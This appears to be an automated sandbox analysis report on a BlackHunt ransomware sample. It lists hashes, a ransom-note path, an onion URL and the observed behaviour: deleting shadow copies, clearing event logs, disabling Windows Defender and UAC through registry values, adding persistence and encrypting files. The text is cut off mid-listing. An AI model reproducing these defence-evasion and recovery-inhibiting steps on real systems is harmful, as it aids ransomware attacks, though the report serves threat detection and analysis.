Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:26
Static task
static1
Behavioral task
behavioral1
Sample
0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe
Resource
win10v2004-20231215-en
General
-
Target
0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe
-
Size
707KB
-
MD5
7be009d2e0af11656b8c377b77fdccd4
-
SHA1
fc1c13374b46ab7a985d0e16858c9add2d6687dd
-
SHA256
0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6
-
SHA512
bfdb206e6db5aa4207b5b5b82debce47f37892779bc86b985c715131461ccdef918c33837efa5773791ab4b4409a8fb1c5ae000ae5e1649c642ef473782663e1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1q8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWJFh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2468 fsutil.exe 4788 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4924 wevtutil.exe 3176 wevtutil.exe 652 wevtutil.exe 328 wevtutil.exe 4644 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1280 bcdedit.exe 2252 bcdedit.exe 4972 bcdedit.exe 3972 bcdedit.exe -
Renames multiple (2893) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2088 wbadmin.exe 4556 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3220 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\L: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\U: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\E: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\A: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\J: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\Z: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\F: conhost.exe File opened (read-only) \??\I: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\T: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\Y: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\X: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\W: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\O: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\H: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\S: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\K: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\V: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\M: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\P: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\B: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened (read-only) \??\N: 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files (x86)\Google\CrashReports\#BlackHunt_ReadMe.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#BlackHunt_ReadMe.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_ReadMe.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_ReadMe.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_performance_Thumbnail.bmp 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\fieldswitch.ax 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_Private.key 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2972 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1588 vssadmin.exe 2500 vssadmin.exe 2768 vssadmin.exe 2880 vssadmin.exe 2652 vssadmin.exe 2560 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4864 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2624 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4144 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeRestorePrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeBackupPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeTakeOwnershipPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeAuditPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeSecurityPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeIncBasePriorityPrivilege 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Token: SeBackupPrivilege 1808 vssvc.exe Token: SeRestorePrivilege 1808 vssvc.exe Token: SeAuditPrivilege 1808 vssvc.exe Token: SeBackupPrivilege 1080 wbengine.exe Token: SeRestorePrivilege 1080 wbengine.exe Token: SeSecurityPrivilege 1080 wbengine.exe Token: SeSecurityPrivilege 328 wevtutil.exe Token: SeBackupPrivilege 328 wevtutil.exe Token: SeSecurityPrivilege 4644 wevtutil.exe Token: SeBackupPrivilege 4644 wevtutil.exe Token: SeSecurityPrivilege 4924 wevtutil.exe Token: SeBackupPrivilege 4924 wevtutil.exe Token: SeSecurityPrivilege 652 wevtutil.exe Token: SeBackupPrivilege 652 wevtutil.exe Token: SeSecurityPrivilege 3176 wevtutil.exe Token: SeBackupPrivilege 3176 wevtutil.exe Token: SeDebugPrivilege 4864 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1848 wrote to memory of 2680 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 154 PID 1848 wrote to memory of 2680 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 154 PID 1848 wrote to memory of 2680 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 154 PID 1848 wrote to memory of 2680 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 154 PID 1848 wrote to memory of 2844 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 153 PID 1848 wrote to memory of 2844 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 153 PID 1848 wrote to memory of 2844 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 153 PID 1848 wrote to memory of 2844 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 153 PID 1848 wrote to memory of 2936 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 151 PID 1848 wrote to memory of 2936 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 151 PID 1848 wrote to memory of 2936 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 151 PID 1848 wrote to memory of 2936 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 151 PID 2680 wrote to memory of 2608 2680 cmd.exe 150 PID 2680 wrote to memory of 2608 2680 cmd.exe 150 PID 2680 wrote to memory of 2608 2680 cmd.exe 150 PID 1848 wrote to memory of 2656 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 148 PID 1848 wrote to memory of 2656 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 148 PID 1848 wrote to memory of 2656 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 148 PID 1848 wrote to memory of 2656 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 148 PID 2844 wrote to memory of 2676 2844 cmd.exe 146 PID 2844 wrote to memory of 2676 2844 cmd.exe 146 PID 2844 wrote to memory of 2676 2844 cmd.exe 146 PID 1848 wrote to memory of 2748 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 30 PID 1848 wrote to memory of 2748 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 30 PID 1848 wrote to memory of 2748 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 30 PID 1848 wrote to memory of 2748 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 30 PID 1848 wrote to memory of 2660 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 145 PID 1848 wrote to memory of 2660 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 145 PID 1848 wrote to memory of 2660 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 145 PID 1848 wrote to memory of 2660 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 145 PID 1848 wrote to memory of 2600 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 143 PID 1848 wrote to memory of 2600 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 143 PID 1848 wrote to memory of 2600 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 143 PID 1848 wrote to memory of 2600 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 143 PID 1848 wrote to memory of 2584 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 141 PID 1848 wrote to memory of 2584 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 141 PID 1848 wrote to memory of 2584 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 141 PID 1848 wrote to memory of 2584 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 141 PID 1848 wrote to memory of 1928 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 140 PID 1848 wrote to memory of 1928 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 140 PID 1848 wrote to memory of 1928 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 140 PID 1848 wrote to memory of 1928 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 140 PID 1848 wrote to memory of 2492 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 138 PID 1848 wrote to memory of 2492 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 138 PID 1848 wrote to memory of 2492 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 138 PID 1848 wrote to memory of 2492 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 138 PID 2656 wrote to memory of 2508 2656 cmd.exe 137 PID 2656 wrote to memory of 2508 2656 cmd.exe 137 PID 2656 wrote to memory of 2508 2656 cmd.exe 137 PID 1848 wrote to memory of 2636 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 135 PID 1848 wrote to memory of 2636 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 135 PID 1848 wrote to memory of 2636 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 135 PID 1848 wrote to memory of 2636 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 135 PID 2748 wrote to memory of 2516 2748 cmd.exe 134 PID 2748 wrote to memory of 2516 2748 cmd.exe 134 PID 2748 wrote to memory of 2516 2748 cmd.exe 134 PID 1848 wrote to memory of 2524 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 32 PID 1848 wrote to memory of 2524 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 32 PID 1848 wrote to memory of 2524 1848 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 32 PID 1848 wrote to memory of 2524 1848 